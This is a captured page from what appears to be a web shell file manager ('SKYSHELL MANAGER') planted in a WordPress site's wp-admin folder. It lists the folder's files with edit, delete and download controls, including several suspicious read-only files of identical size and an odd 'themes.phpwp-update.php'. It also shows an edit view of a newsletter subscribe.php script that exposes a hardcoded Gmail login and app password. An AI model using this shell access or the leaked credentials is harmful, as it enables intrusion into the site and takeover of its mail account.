📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-ajax.php
5.03 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-functions.php
0.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-advanced.php
28.79 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-tags.php
21.98 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tools.php
3.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets.php
1.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-load.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: subscribe.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>smsboxs</title> <link rel="icon" type="images" href="images/logo.jpg"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <link href="style.css" rel="stylesheet" type="text/css" /> <script type="text/javascript" src="js/jquery.js"></script> <script type="text/javascript" src="js/cufon-yui.js"></script> <script type="text/javascript" src="js/arial.js"></script> <script type="text/javascript" src="js/cuf_run.js"></script> <script type="text/javascript" src="js/radius.js"></script> </head> <style> .button { border-radius: 5px; background-color: #4CAF50; /* Green */ border: none; color: white; padding: 10px 25px; text-align: center; text-decoration: none; display: inline-block; font-size: 16px; margin: 4px 2px; cursor: pointer; } .button5 {background-color: #555555;} /* Black */ </style> <style> #g-recaptcha-response { display: block !important; position: absolute; margin: -78px 0 0 0 !important; width: 302px !important; height: 76px !important; z-index: -999999; opacity: 0; } </style> <script> window.addEventListener('load', () => { const $recaptcha = document.querySelector('#g-recaptcha-response'); if ($recaptcha) { $recaptcha.setAttribute('required', 'required'); } }) </script> <script src="https://www.google.com/recaptcha/api.js" async defer></script> <body> <div class="main"> <div class="header"> <div class="header_resize"> <div class="logo"> <img src="images/logo.jpg" alt="" width="51" height="48" /> <h1><a href="index.php">sms<span>boxs</span></a><small>Create more friends</small></h1> </div> <div class="clr"></div> <div class="menu_nav"> <ul style="width: 100%;"> <li class="active"><a href="index.php">Home</a></li> <li><a href="support.php">Meet New Friends</a></li> <li><a href="about.php">About us</a></li> <li class="last"><a href="contact.php">Contact us</a></li> <li class="last"><a href="subscribe.php">Subscribe us</a></li> </ul> </div> <div class="clr"></div> <div class="header_img"> <img src="images/img_top.jpg" alt="" width="960" height="326" /></div> </div> </div> <div class="clr"></div> <div class="content"> <div class="content_resize"> <div class="mainbar"> <div class="article"> <h2><span>Subscribe our newsletter</span></h2> <div class="clr"></div> <p>You can find more of new friends in our website. </p> </div> <div class="article"> <h2><span>Send us</span> mail</h2> <div class="clr"></div> <form action="subscribe.php" method="post"> <ol> <li> <label for="email">Email Address (required)</label> <input style="width: 50%" id="email" name="email" class="text" /> </li> <li> <input type="submit" name="Submit" value="Subscribe us" class="button button5"> <div class="clr"></div> </li> </ol> </form> <?php use PHPMailer\PHPMailer\PHPMailer; use PHPMailer\PHPMailer\SMTP; use PHPMailer\PHPMailer\Exception; //require_once __DIR__ . '/vendor/phpmailer/src/Exception.php'; require_once __DIR__ . '/vendor/phpmailer/src/PHPMailer.php'; require_once __DIR__ . '/vendor/phpmailer/src/SMTP.php'; //subscribe form if (isset($_POST['Submit'])){ $name=$_REQUEST['name']; $email=$_REQUEST['email']; $message=$_REQUEST['message']; if (($email=="")||($email=="")) { echo "All fields are required, please fill the form again."; } else{ $mail = new PHPMailer(true); // Server settings //$mail->SMTPDebug = SMTP::DEBUG_SERVER; // for detailed debug output $mail->isSMTP(); $mail->Host = 'smtp.gmail.com'; $mail->SMTPAuth = true; $mail->SMTPSecure = PHPMailer::ENCRYPTION_STARTTLS; $mail->Port = 587; $mail->Username = 'jackdaniel@smsboxs.com'; // YOUR gmail email $mail->Password = 'pkmdbdwnvwtfaill'; // YOUR gmail password // Sender and recipient settings $mail->setFrom('jackdaniel@smsboxs.com', 'smsboxs'); $mail->addAddress($email, $name, $message); $mail->addReplyTo('jackdaniel@smsboxs.com', 'smsboxs'); // to set the reply to // Setting the email content $mail->IsHTML(true); $mail->Subject = "Subscribe Replay [Success]"; $mail->Body = "<h2>Thank you for Subscribe us.</h2> <p>This message confirms that you have subscribed from the smsboxs.</p>"; $mail->AltBody = "This is the plain text version of the email content"; if(!$mail->send()) { echo "Success! check sometimes later."; } else { echo "Success! check your email."; } $mail2 = new PHPMailer(true); // Server settings //$mail2->SMTPDebug = SMTP::DEBUG_SERVER; // for detailed debug output $mail2->isSMTP(); $mail2->Host = 'smtp.gmail.com'; $mail2->SMTPAuth = true; $mail2->SMTPSecure = PHPMailer::ENCRYPTION_STARTTLS; $mail2->Port = 587; $mail2->Username = 'jackdaniel@smsboxs.com'; // YOUR gmail email $mail2->Password = 'pkmdbdwnvwtfaill'; // YOUR gmail password // Sender and recipient settings $mail2->setFrom('jackdaniel@smsboxs.com', 'smsboxs'); $mail2->addAddress('jackdaniel@smsboxs.com', 'smsboxs'); //$mail->addReplyTo('jackdaniel@smsboxs.com', 'smsboxs'); // to set the reply to // Setting the email content $mail2->IsHTML(true); $mail2->Subject = "Subscribe Details"; $mail2->Body = "<strong>Following user has been submitted subscribe details on your website <strong><br> Name : $name<br> Email : $email<br> Message : $message<br>"; //$mail->AltBody = "This is the plain text version of the email content"; $mail2->send(); } } ?> </div> </div> <div class="sidebar"> <div class="gadget"> <h2 class="star">For first time visitors</h2> <div class="clr"></div> <ul class="sb_menu"> <li><a href="#">Chat with strangers</a></li> <li><a href="#">Free</a></li> </ul> </div> <div class="gadget"> <h2 class="star"><span>Most popular!</span></h2> <div class="clr"></div> <ul class="ex_menu"> <li><a href="#">Chat with strangers</a></li> <li><a href="#">Free</a></li> <li><a href="#">Friend list</a></li> <li><a href="#">Message history</a></li> <li><a href="#">Access to public chat rooms</a></li> <li><a href="#">Personalized profile</a></li> </ul> </div> </div> <div class="clr"></div> </div> </div> <div class="fbg"> <div class="fbg_resize"> <div class="col c1"> <h2><span>Contact us</span></h2> <p><b>Email : </b>jackdaniel@smsboxs.com</p> <p><b>Phone : </b>(+91) 80987 83231</p> <p><b>Address : </b>17, Dr Radha Krishnan Salai,<br> Krishnapuram, Mylapore,<br> Chennai, Tamil Nadu 600004.</p> </div> <div class="col c2"> <h2><span>Find Strangers Online </span></h2> <p>chat to meet is an online community with the ambition to group people who are trying to find new friends. We aim to provide the most exciting public chat rooms and the most interesting private face to face chat rooms.</p> </div> <div class="col c3"> <h2><span>What makes chat to meet special?</span></h2> <p>We like to think that the community of people who use this service make it the best place to connect online to chat and meet new people.</p> </div> <div class="clr"></div> </div> <div class="footer"> <p>Copyright © 2025 <a href="smsboxs.com">smsboxs.com</a> - All Rights Reserved. <span style="float:right;"><a href="subscribe.php">Subscribe us</a> <a href="unsubscribe.php">Opt-out our newsletter</a></span></p> <div class="clr"></div> </div> </div> </div> </body> </html>
Save